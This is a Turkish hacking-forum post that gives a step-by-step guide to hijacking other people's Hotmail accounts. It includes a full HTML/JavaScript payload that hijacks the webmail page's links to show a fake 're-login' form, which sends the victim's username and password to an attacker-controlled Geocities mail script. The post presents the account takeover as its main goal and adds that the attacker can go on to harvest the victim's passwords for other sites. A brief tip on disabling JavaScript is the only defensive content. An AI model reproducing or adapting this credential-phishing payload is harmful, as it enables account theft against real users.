İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasil mi oluyor?

20-11-2009 17:34
#1
lordtube - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2009
Nereden:
C:Windows
Mesajlar:
442
Teşekkür (Etti):
16
Teşekkür (Aldı):
406
Konular:
88
Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i görüntüledigi zaman Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasini söylüyor.Tabii böyle olunca size kurbanin kullanici adi ve ip adresini iceren bir e-mail geliyor.
Tabii siz kullanici adini ve sifresini ögrendiginiz zaman hesabin tam kullanin hakkini kazaniyorsunuz.silmek, okumak, kurban adina mailler göndermek... Tabii siz bos durmayip POP Mail'leride kontrol ediyorsunuz ve kurbanin diger sitelerdeki hesaplarinin sifrelerini aliyorsunuz.
Peki bu olaydan kurtulamayacagiz mi ??
Netscape kullanicilari javascript ayarlarini söyle kapatabilir. (edit / preferences / advanced / disablejavascript).
Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir. (view / internet options /security / custom settings / scripting / disable active scripting).

Tabii En Önemlisi Baskasinin Hotmail Hesabini Nasil Ele Geciririz ???
Asagidaki Listedekiler elimizde olmali.
  • <LI style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in" class=MsoNormal>1 Internete bagli bir bilgisayar... eh yani :-))<LI style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in" class=MsoNormal>1 Netscape Mail (veya herhangi bir e-mail programi)
  • 1 Notepad (veya herhangi bir text editor)

1.ADIM
hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.

2.ADIM:
Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda e-mail adresini kullandik.ve geocities'ten bir e-mail adresi aldik.örnegin(ybwc@geocities.com).

3.ADIM:
NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit ediyoruz. Satir 17'de Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi. (bu kullanici adini kendinize göre degistirin.)


<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
**********
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason:&nbsp;</font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\">&nbsp;<input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.********.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.********.links[i].target="work";
top.submenu.********.links[i].href="javascript:getmess()";
}

noworklinks=top.work.********.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.********.links[i].target="work";
top.work.********.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>


4.ADIM
kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban, (victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve gönderiyoruz.

5.ADIM
Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail aliyoruz. Tabii bu mail'de kurbanimizin kullanici adi, sifresi ve ip adresi oluyor...
hackertt09, caxper, hackerturkkk Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı